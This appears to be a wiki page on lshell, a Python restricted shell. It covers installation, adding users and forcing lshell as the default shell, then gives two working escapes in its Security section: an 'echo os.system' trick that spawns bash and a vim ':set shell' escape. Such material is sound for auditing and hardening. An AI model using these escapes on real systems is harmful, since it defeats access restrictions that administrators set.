Description

Limited Shell (lshell) is a python based shell that enables to restrict commands for users.

Installation

# apt-get install lshell

Usage

Add user to lshell

To add a user to lshell, just issue:

# usermod -aG lshell pilou

Force lshell

To force lshell as default shell for a user, issue following command:

# chsh -s /usr/bin/lshell pilou

Security

Bypassing lshell with os.system

lshell can be easily bypassed provided you have access to the "echo" command:

With lshell, the user is restricted to a number of limited commands:

user:~$ id
*** unknown command: id
user:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

But it can be easily bypassed:

user:~$ echo os.system('/bin/bash')
user@lshell:~$ id
uid=1000(user) gid=1000(user) groupes=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),110(lshell)

Bypassing lshell with vi(m)

If you have access to vi(m), it's also easy to bypass lshell with vi or vim. Start vim:

user:~$ vim

Once inside, issue:

:set shell=/bin/sh
:shell

Comments

Talk:Lshell

Lshell

Contents

Description

Installation

Usage

Add user to lshell

Force lshell

Security

Bypassing lshell with os.system

Bypassing lshell with vi(m)

Comments

Share your opinion

Navigation menu

Lshell

Description

Installation

Usage

Add user to lshell

Force lshell

Security

Bypassing lshell with os.system

Bypassing lshell with vi(m)

Comments

Share your opinion

Navigation menu

Search